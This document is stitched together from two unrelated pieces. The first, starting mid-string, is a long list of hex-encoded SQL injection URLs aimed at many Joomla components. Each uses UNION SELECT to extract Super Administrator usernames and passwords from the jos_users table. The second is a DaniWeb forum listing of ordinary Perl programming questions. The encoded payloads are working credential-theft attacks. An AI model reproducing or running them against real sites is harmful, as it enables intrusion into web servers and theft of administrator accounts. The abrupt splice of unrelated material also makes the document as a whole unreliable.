x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x75\x61\x72\x63\x61\x64\x65\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x32\x26\x66\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x72\x73\x67\x61\x6c\x6c\x65\x72\x79\x26\x70\x61\x67\x65\x3d\x69\x6e\x6c\x69\x6e\x65\x26\x63\x61\x74\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x78\x73\x73\x74\x72\x65\x61\x6d\x2d\x64\x6d\x26\x49\x74\x65\x6d\x69\x64\x3d\x36\x39\x26\x6d\x6f\x76\x69\x65\x3d\x2d\x31\x2f\x2a\x2a\x2f\x75\x6e\x69\x6f\x6e\x2f\x2a\x2a\x2f\x73\x65\x6c\x65\x63\x74\x2f\x2a\x2a\x2f\x31\x2c\x32\x2c\x61\x64\x6d\x69\x6e\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2f\x2a\x2a\x2f\x66\x72\x6f\x6d\x2f\x2a\x2a\x2f\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x69\x62\x6c\x65\x73\x74\x75\x64\x79\x26\x76\x69\x65\x77\x3d\x6d\x65\x64\x69\x61\x70\x6c\x61\x79\x65\x72\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c\x32\x37\x2c\x32\x38\x2c\x32\x39\x2c\x33\x30\x2c\x33\x31\x2c\x33\x32\x2c\x33\x33\x2c\x33\x34\x2c\x33\x35\x2c\x33\x36\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34\x30\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x66\x71\x26\x49\x74\x65\x6d\x69\x64\x3d\x39\x39\x39\x26\x6c\x69\x73\x74\x69\x64\x3d\x39\x39\x39\x2f\x2a\x2a\x2f\x75\x6e\x69\x6f\x6e\x2f\x2a\x2a\x2f\x73\x65\x6c\x65\x63\x74\x2f\x2a\x2a\x2f\x30\x2c\x63\x6f\x6e\x63\x61\x74\x20\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2f\x2a\x2a\x2f\x66\x72\x6f\x6d\x2f\x2a\x2a\x2f\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2f\x2a","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x26\x74\x61\x73\x6b\x3d\x76\x69\x65\x77\x74\x65\x61\x6d\x26\x74\x65\x61\x6d\x49\x44\x3d\x2d\x31\x2b\x75\x6e\x69\x6f\x6e\x2b\x73\x65\x6c\x65\x63\x74\x2b\x6e\x75\x6c\x6c\x2c\x6e\x75\x6c\x6c\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x63\x6f\x6e\x63\x61\x74\x20\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x38\x2b\x66\x72\x6f\x6d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6a\x61\x62\x6f\x64\x65\x26\x74\x61\x73\x6b\x3d\x73\x69\x67\x6e\x26\x73\x69\x67\x6e\x3d\x74\x61\x75\x72\x75\x73\x26\x69\x64\x3d\x2d\x32\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6e\x65\x74\x69\x6e\x76\x6f\x69\x63\x65\x26\x61\x63\x74\x69\x6f\x6e\x3d\x6f\x72\x64\x65\x72\x73\x26\x74\x61\x73\x6b\x3d\x6f\x72\x64\x65\x72\x26\x63\x69\x64\x3d\x2d\x31\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54\x20\x31\x2c\x32\x2c\x33\x2c\x63\x6f\x6e\x63\x61\x74\x28\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x29\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x2c\x31\x37\x2c\x31\x38\x2c\x31\x39\x2c\x32\x30\x2c\x32\x31\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c\x32\x37\x2c\x32\x38\x2c\x32\x39\x2c\x33\x30\x2c\x33\x31\x2c\x33\x32\x2c\x33\x33\x2c\x33\x34\x2c\x33\x35\x2c\x33\x36\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36\x2c\x34\x37\x2c\x34\x38\x20\x46\x52\x4f\x4d\x20\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x62\x65\x61\x6d\x6f\x73\x70\x65\x74\x69\x74\x69\x6f\x6e\x26\x70\x65\x74\x3d\x2d\x35\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x70\x72\x61\x79\x65\x72\x63\x65\x6e\x74\x65\x72\x26\x74\x61\x73\x6b\x3d\x76\x69\x65\x77\x5f\x72\x65\x71\x75\x65\x73\x74\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x61\x72\x74\x69\x73\x74\x26\x69\x64\x67\x61\x6c\x65\x72\x79\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x32\x2c\x33\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x6a\x6f\x6f\x6d\x72\x61\x64\x69\x6f\x26\x70\x61\x67\x65\x3d\x73\x68\x6f\x77\x5f\x76\x69\x64\x65\x6f\x26\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x71\x75\x6f\x74\x65\x73\x26\x69\x64\x3d\x31\x33\x2b\x61\x6e\x64\x2b\x31\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x69\x64\x6f\x62\x6c\x6f\x67\x26\x74\x61\x73\x6b\x3d\x75\x73\x65\x72\x62\x6c\x6f\x67\x26\x75\x73\x65\x72\x69\x64\x3d\x34\x32\x2b\x61\x6e\x64\x2b\x31\x3d\x31\x2b\x55\x4e\x49\x4f\x4e\x2b\x53\x45\x4c\x45\x43\x54\x2b\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x63\x6f\x6e\x63\x61\x74\x28\x30\x78\x31\x65\x2c\x75\x73\x65\x72\x6e\x61\x6d\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x70\x61\x73\x73\x77\x6f\x72\x64\x2c\x30\x78\x31\x65\x2c\x30\x78\x33\x61\x33\x61\x33\x61\x33\x61\x2c\x75\x73\x65\x72\x74\x79\x70\x65\x2c\x30\x78\x31\x65\x29\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2c\x31\x2b\x46\x52\x4f\x4d\x2b\x6a\x6f\x73\x5f\x75\x73\x65\x72\x73\x2b\x77\x68\x65\x72\x65\x2b\x75\x73\x65\x72\x74\x79\x70\x65\x3d\x30\x78\x35\x33\x37\x35\x37\x30\x36\x35\x37\x32\x32\x30\x34\x31\x36\x34\x36\x64\x36\x39\x36\x65\x36\x39\x37\x33\x37\x34\x37\x32\x36\x31\x37\x34\x36\x66\x37\x32\x2d\x2d","\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x6f\x70\x74\x69\x6f\x6e\x3d\x63\x6f\x6d\x5f\x65\x61\x73\x79\x62\x6f\x6f\x6b\x26\x49\x74\x65\x6d\x69\x64\x3d\x31\x26\x66\x75\x6e\x63\x3d\x64\x65\x6c\x65\x74\x65\x65\x6e\x74\x72\x79\x26\x67\x62\x69\x64\x3d\x2d\x31\x2b\x55\x4e\x49\

0
97
Member Avatar for ssdeep

i want to be able to treat contents of a file as an array and traverse through it that way without having to store them in an array,can i do that?if so how?

Member Avatar for Dandello
0
242
Member Avatar for biojet

Hi all, I try to find the average of colum with perl. I find in forum that have the question [url]http://www.daniweb.com/software-development/perl/threads/328723[/url]. [CODE]use 5.010; my (@arr, %arr, $row); while(<DATA>){ @arr=split(/\s+/, $_); for (my $i=1; $i<=$#arr; $i++){ $arr{$i}+=$arr[$i]; } $row++; } say ("total of column $_ is $arr{$_} and average is \t", …

Member Avatar for biojet
0
187
Member Avatar for cacofonix

Hi, i am trying to write some data into the text file using PERL . In that file ^M is appeared on each line . Since i am new to PERL , i couldn't figure it out . Guys please help me to fix this problem.

Member Avatar for thines01
0
181
Member Avatar for screwfacecapone

I am working on a web application that builds a KML file using a list of coordinates and is supposed to display them on Google maps when you click a button. When I'm testing it on desktop it works, as it brings up google earth with no problem. However, when …

0
183
Member Avatar for sandeepau

Hello, I'm executing following Perl script program with purpose of comparing two text file & save output in third file with flags. However, the execution process of this Perl script taking too much time for large size input text file. Can someone suggest performance optimization technique for following script. 1. …

0
78
Member Avatar for FALL3N

hey.. I recently learned a bit of Perl, and I want to test it out on the net... I was/am under the impression that a perl script can be embedded into HTML, but I am have trouble with that. I searched it but I came up with several methods, none …

Member Avatar for Dandello
0
187
Member Avatar for axn

How do i match "00:04" and "4+21:08" which is ("days+hrs:mins" and "hrs:mins") in a file. I would like to combine regex patterns so I can calculate running time. This is what i got for regex but does not match "00:04" --> (\d\d)(\:)(\d\d) [CODE]if($string = ~ m/(\d)(\+)(\d\d)(\:)(\d\d)/) { #code goes here …

Member Avatar for axn
0
161
Member Avatar for andarivaadu1

Hi everyone, I have a web application developed using php. I want to add a new feature in it. When the user searches for some book details, all the book details are displayed. Now when the user clicks on a book name in the search results, He will be redirected …

Member Avatar for diafol
0
177
Member Avatar for jam2010

Hi All, Can anyone answer below question. when to use use DBI; and when to use use DBD? Thanks in advance

Member Avatar for techieguy31
0
67
Member Avatar for WolfShield

For those of you unfamiliar with Google Documents, it is like Microsoft Word/Excel/etc. online. I would like to create a simple online document editing program where a logged-in users could edit and save a book or other text-based document. However I do not have a lot of Web Programming experience …

0
77
Member Avatar for cmprmand

Hi All, New to perl and looking for a solution. I have two txt files as below File 1: [CODE] dn: o=GEEVET REMEDIES,c=IN objectClass: top objectClass: organization o: GEEVET REMEDIES dn: o=K.G.RUBBER (INDIA) PRIVATE LIMITED,c=IN objectClass: top objectClass: organization o: K.G.RUBBER (INDIA) PRIVATE LIMITED dn: o=SUDESH JAIN,c=IN objectClass: top objectClass: …

0
92
Member Avatar for krish0202

I have an XML file that has 144 columns for the last 12 year's rolling data -- and the column name: goes like this: Column> <Selected/> <SourceName>09/1999 XYZValue</SourceName> <DestinationName>Sep1999_XYZDestination</DestinationName> <TypeName>FLOAT</TypeName> </Column> <Column> <Selected/> <SourceName>10/1999 XYZValue</SourceName> <DestinationName>Oct1999_XYZDestination</DestinationName> <TypeName>FLOAT</TypeName> </Column> ......... all the way to <Column> <Selected/> <SourceName>08/2011 XYZValue</SourceName> <DestinationName>Aug2011_XYZDestination</DestinationName> <TypeName>FLOAT</TypeName> </Column> …

0
83
Member Avatar for pauldespre

I have this example: [CODE]use warnings; use strict; open LYNX, "lynx –source http://www.perl.com/ |" or die "Can't open lynx: $!"; # Define $_ and skip through LYNX until a line containing "standard.def" $_ = ""; $_ = <LYNX> until /standard\.def/; # The headline is in the following line: my $head …

0
68
Member Avatar for GadiK

I have 2 Windows machines. One physical for development and another (virtual) for testing. I want to write a PERL script that would take my compiled files and copy them to predefined locations on the virtual machine (backing up existing files). Before copying the files I need to check for …

Member Avatar for GadiK
0
1K
Member Avatar for schoolboy2010

I have this script that is supposed to check if a number the user guesses is the same as the randomly generated number. Problem is that the random number generated at the start of the program keeps on changing everytime I click on the "Check if I'm right" button, the …

Member Avatar for schoolboy2010
0
223
Member Avatar for brax4444

Hello all, I'm trying to read in an entire tab-delimited files with the following data layout: File Title Line is always at the top. DataName1 DataNam2 DataName3 12345 123.4 12.456 9876 987.65 45678 There may be any number of rows and columns after the title line. I want to read …

Member Avatar for voidyman
0
472
Member Avatar for voidyman

I want to remove blank lines (empty or with spaces and tabs) from a file from within a perl script. here's what i tried. [CODE]`sed '/^ *\$/d' $file1`;[/CODE] Does not seem to work for some reason. Any Help please?

Member Avatar for voidyman
0
938
Member Avatar for terabyte

I have a text file in spanish, how can I normalize all spanish characters (remove tildes and covert letters) example convert all ñ to n's ó to o I know about the Unicode::Normalize module but I don't understand how to use it

Member Avatar for perl_monkey
-1
65
Member Avatar for crazyIT

am trying to open a file but the problem is on the third line (open...) sub open_file { local $/ = undef; ($filevar, $filemode, $filename) = @_; open ($filevar, $filemode . $filename) || die ("Can't open $filename"); } everytime i run it i get the error: Can't use string ("FILE1") …

Member Avatar for Dandello
0
160
Member Avatar for geosparovany2

Hi everyone....iam electronics engineering student and i have experienced some c++ ,i mean i know till oop basics... i want to learn scriptig language for EDA, i want to know which to learn...Perl or Python?....can python do everything perl can do??....i hear that perl is much harder to learn...is it …

Member Avatar for Tumlee
0
231
Member Avatar for rakesh.cp

FILE A nsRoleDN: "cn=/BCE/AdminRole,dc=bce,dc=ca",dc=bce,dc=ca uid: uid1 creatorsName: cn=directory manager createTimestamp: 20050428180535Z NetworkElement-allowedNETypeList: NAME1 NetworkElement-allowedNETypeList: NAME2 NetworkElement-allowedNETypeList: NAME3 NetworkElement-allowedNETypeList: NAME5 NetworkElement-allowedNETypeList: NAME6 NetworkElement-allowedNETypeList: NAME7 modifiersName: cn=puser,ou=dsame users,dc=bce,dc=ca modifyTimestamp: 20090219190143Z nsRoleDN: "cn=/BCE/DARTS,dc=bce,dc=ca",dc=bce,dc=ca uid: uid2 creatorsName: cn=directory manager createTimestamp: 20050428180535Z NetworkElement-allowedNETypeList: NAME1 NetworkElement-allowedNETypeList: NAME2 NetworkElement-allowedNETypeList: NAME3 NetworkElement-allowedNETypeList: NAME5 NetworkElement-allowedNETypeList: NAME6 NetworkElement-allowedNETypeList: NAME7 NetworkElement-allowedNETypeList: …

0
65
Member Avatar for federerforehand

[ICODE]import java.util.Random; public class Card { public String cardGeneration() { Random generator = new Random(); int x; // random integer representing suit int y; // random integer for card value String mysuit, mynumber; //assigning names, these will be changed int suits = 4, numbers = 13; //depending what card is …

Member Avatar for hfx642
0
220
Member Avatar for damorph

I am a complete beginner to PERL. I am using Strawberry PERL. I am coming across text files that I need to format. I basically need to take field data that starts with a certain character and output the field data to a new file which will have all the …

Member Avatar for d5e5
0
241
Member Avatar for andarivaadu1

[CODE]<?php $author_id = $_GET['author']; $subject = $_GET['subject']; $pubtype = $_GET['type']; $year = $_GET['year']; $college = $_GET['college']; $department = $_GET['department']; $keyword = $_GET['keyword']; $keyword = mysql_real_escape_string($keyword); $subject = mysql_real_escape_string($subject); $year = mysql_real_escape_string($year); //If any of the fields were left blank, we will assign % to the variable to use as wildcards …

Member Avatar for joehms22
-1
160
Member Avatar for uvray90

Hello guys.. I am new to Perl and now reached till database concepts in Perl. I am using Wamp server in my computer. Is it possible to connect to the MySQL running in it :-/ ? But the Perl code is giving error while trying to connect to the SQL …

Member Avatar for d5e5
0
248
Member Avatar for BenCraven

Hi, I'm fairly new to php and sql, and was wondering if this question could be easily answered, I'll do my best to be as concise as possible; I have a table within a database that I'm using to return basic searches for my company to find specific products, i.e …

Member Avatar for smantscheff
0
126
